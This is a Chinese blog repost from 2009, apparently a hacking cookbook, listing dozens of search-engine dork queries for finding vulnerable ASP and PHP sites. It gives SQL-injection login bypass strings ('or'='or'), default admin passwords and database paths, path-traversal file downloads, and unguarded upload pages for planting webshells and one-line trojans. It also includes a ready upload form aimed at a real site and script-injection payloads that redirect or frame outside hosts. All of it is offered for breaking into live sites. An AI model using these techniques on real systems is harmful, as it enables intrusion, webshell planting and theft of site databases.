网站漏洞收集大全[更新]

2009年11月24日星期二 | | |

 网站漏洞收集

来源:光用嘴胡说八道的博客

1,
到GoogLe,搜索一些关键字,edit.asp?               韩国肉鸡为多,多数为MSSQL数据库!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆

4,
关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为               'or'='or'


5.
动感购物系统
              inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞


6。
默认数据库地址blogdata/acblog.asa
              关键字:acblog

7.
百度 /htdocs
              注册里可以直接上传asa文件!


8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version


9.
用挖掘机          
关键字:Powered by webBOY
页面:/upfile.asp

10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

11.
Upfile_Article.asp               bbs/upfile.asp
输入关键字:powered by mypower ,

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
现在GOOGLE搜索关键字                 intitle:网站小助手 inurl:asp

14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添               setup.asp


15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手               下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了

16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb               试试

17.
无忧传奇官方站点程序。
                  1、后台管理地址:http://您的域名/msmiradmin/
                  2、默认后台管理帐号:msmir
                  3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp

18.
百度里输入/skins/default/

19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞   工具使用

20.
上传漏洞.
工具 : Domain3.5
                  网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp


21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1               明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp  
                  upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
                  Upfile_Soft.asp
                  upfile_adpic.asp
                  upfile_softpic.asp

23.
注射漏洞
百度搜索:oioj's blog

24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'

26.
入侵魔兽私服
需要的工具:ASP木马一只。
                    Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb

27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网:               ReloadForumCache.asp
Leadbbs:               makealltopanc.asp
BBSXP:               admin_fso.asp
动易:               admin_articlerecyclebin.asp

28.
国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
                  2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"

30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

33.
工具:                 挖掘机 辅臣数据库读取器
关键字:               企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

34.
关键子               XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。

35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData                   动网数据库备份默认路径

36.
工具:网站猎手               WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'

37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp

38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.

39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1                 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧

41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb

43.
关键字:六合彩 inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马

44.
工具:一句话木马
                BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin

46.

                  1 挖掘鸡  
                  2 asp木马(要免杀哦)  
                  3 自制的本地上传页面             重要的哦!
挖掘机输入以下:
       
关键字:格式0791-6274752/或0791-6274752重要的是懂得举一反三


后缀名:upfile_other.asp

先注册个号然后上传

本地上传页面代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0055)http://www.junda888.com/upload.asp -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>


<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="地址/upfile_other.asp" method=post
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

47.

工具:1》网站猎手2.0
              2》一句话木马
              3》一句话木马客户端增强版

搜索inurl:hack.asp

添加system/mdb/system.asp

它的数据库 我们在注册的时候 添写我们的一句话木马

然后连接`~


跨站~~</textarea><Meta http-equiv="refresh" content="3;url='http://bbs.ghkcn.cn' "><textarea>


</title><iframe src=http://www.hackfeng.com width=999 height=999></iframe><title>

48

挖掘鸡           ASP马           辅臣数据库浏览器 1.0           还有网站
http://www.cmd5.com/default.aspx

关键词           power by shotan           数据库 database/shotan.mdb

49


需要的工具:网站猎手
              明小子或辅臣数据浏览器
              ASP`大马.小马

关键字:专题二最新文章

后辍名:数据库路径:/database/PowerEasy2006.mdb
            后台路径:/admin/Admin_Login.asp
50.工具准备:网站猎手
关键字:wodig.com, all rights
默认数据库:wodb\2006wodig2.asp

51

CompHonorBig.asp?id=

52

ProductShow.asp?ArticleID=
                  可找到这样的站
                      找upfile_Other.asp

53

inurl:sc.asp

54 \

inurl:/manage/Login.asp 公司后台
55

关键字输入
选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
我们选upload.asp

56

数据库名称:scadata.mdb
数据目录:data/scadata.mdb

关键字:本站部分信息由企业自行提供,该企业负责信息内容的真实性、准确性和合法性

企业会员 商贸机会 产品展示 行业新闻 展会信息

57


Powered by:MyPower Ver3.51,选择30页,搜索

 

 

 

====================================


入侵网站关键字
默认数据库: Databases/myszw.mdb Databases/myszw1.mdb
上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
关键字:网站建设公司企业网站管理系统
后缀: admin/login.asp
---------------------------------------
关键字:网梦购物系统 gCS木马
GOOGLE里搜索关键字:
上面的这个名字只是该留言者使用的昵称,不代表任何管理员身份!
把index.asp换成 mdb/vcsbook.asp
代码:
---------------------------------------
关键子:inurl:Went.asp
后缀:manage/login.asp
密码:'or''=''or'
============================
关键字:acblog
blogdata/acblog.asa    默认数据库。
=======================================
关键字:Copyright ? 2005-2008??Power
然后写入默认数据库:databass/datashop.asp
在网址后面加上主页后面加上:linktianjia.asp
申请连接输入一句话代码:
或者点下面的管理入口 密码:'or'='or'
一句话连接的时候在网站后面加上:databass/datashop.asp
========================================================
关键词 co net mib ver 1.0 design by hypo
搜索网站 [url=http://www.yahoo.cn/][color=#777777]http://www.yahoo.cn[/color][/url]
密码 'or'='or'
==============================================
新云漏洞:把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 找到数据库地址比如 [url=http://www.123.com/][color=#777777]www.123.com[/color][/url] 这个站 那么数据库地址就是 [url=http://www.123.com/database][color=#777777]http://www.123.com/database[/color][/url]\xzws.mdb 大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了如:#xzws.mdb 改成%23xzws.mdb 那么数据库就是[url=http://www.123.com/database][color=#777777]http://www.123.com/database[/color][/url]\%23xzws.mdb然后下载 数据库
======================================================
网站猎手 一句话木马
关键字:Powered by BBSXP 7.00
后缀:DataBase\BBSXP7.mdb
默认后台:/bbsxp/Login.asp
=====================================
关键字:Management Ver 3.0 Build 20030628
后缀:upload.asp
一:网站猎手 t0/fF'G ZD
二:明小子
三:ASP木马 =DUs
====================
密码:'or'='or'
搜索:WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6
Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.asp?table=
edit.asp?boardname=
action=
cnunews=
news_main&acode=
asp?id=1
asp?id=2   
&idx=
edit.asp?idx=
啊D注入工具 百度搜索
=========================
搜索:Co Net MIB Ver 1.0网站后台管理系统   
===============================================
用到工具:挖掘鸡
后缀添加:admin/login.asp
搜索关键词:申请会员有什么好处?
密码:'or'='or'
=================================
啊D注入工具--百度----关键子:admin
====================================
挖掘机关键字:Powered by WEBBOY页面:/upfile.asp
网站猎手关键字:Powered by mypower 后缀:upfile_photo.asp
upfile_softpic.asp
upfile_adpic.asp
======================
关键字:Power BY:VenShop V7.01 Copyright:VenShop.Com
密码:'or'='or'
======================= ;:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
        Upfile_Soft.asp
        upfile_adpic.asp
        upfile_softpic.asp
===============================
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
        upfile_flash.asp
=============================
网上搜索 inurl:manage/login.asp
======================================
关键字ower BY:VenShop V7.01
后台地址:ad_login.asp
密码:'or'='or'
====================
关键字:Powered by WEBBOY
后缀:/upfile.asp
工具:明小子上传
====================
关键词:inurl: asp?=数字   
        inurl: php?=数字
===========================
关键字:went.asp
后缀:manage/login.asp
==========================
添加后缀/msmir_net.mdb
搜索:inurl:Msmir_DownLoads
===============================
关键字Powered By :SMT Version 5.0
后缀:upfile_flash.asp
===========================
关键字:你要入侵的类别 inurl:asp
工具:啊D注入工具
==================================
========================================
一、入侵BBSXP系统:
用到的工具:网站猎手    数据库小助手 MD5密码破解工具
关键词:广告合作
管理员登陆地址:BBS主页
默认数据库地址:/DATABASE/BBSXP.MDB
-----------------------------------------
二、入侵动网论坛
用到工具:网站猎手    数据库小助手 MD5密码破解工具
关键词:powered by dvbbs
默认数据库地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
或者/bbs/Data/dvbbs7.mdb   
管理员登陆地址:BBS主页
默认管理员帐号密码:admin admin888
--------------------------------------
三、入侵新云系统
用到的工具:数据库小助手 MD5密码破解工具 挖掘鸡
关键词:本站所提供的程序均来自于 Internet 所以无法保证下载后一定可以安装
管理员登陆地址:/admin/admin_login.asp U
默认数据库:database/#newasp.mdb(因为加了#在浏览器是无法连接的。所以我们要改成%23)
database/%23newasp.mdb
默认管理员帐号密码:admin admin
-----------------------------------
四、入侵无忧传奇系统
用到的工具:网站猎手    数据库小助手 MD5密码破解工具
关键字: inurl:Msmir_DownLoads
默认数据库地址:数据库连接:/msmir_net.mdb 或/msmir/msmir.mdb
管理员登陆地址:admin.asp
默认管理员帐号密码:msmir msmir

 From:http://www.sai52.com/archives/86/
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]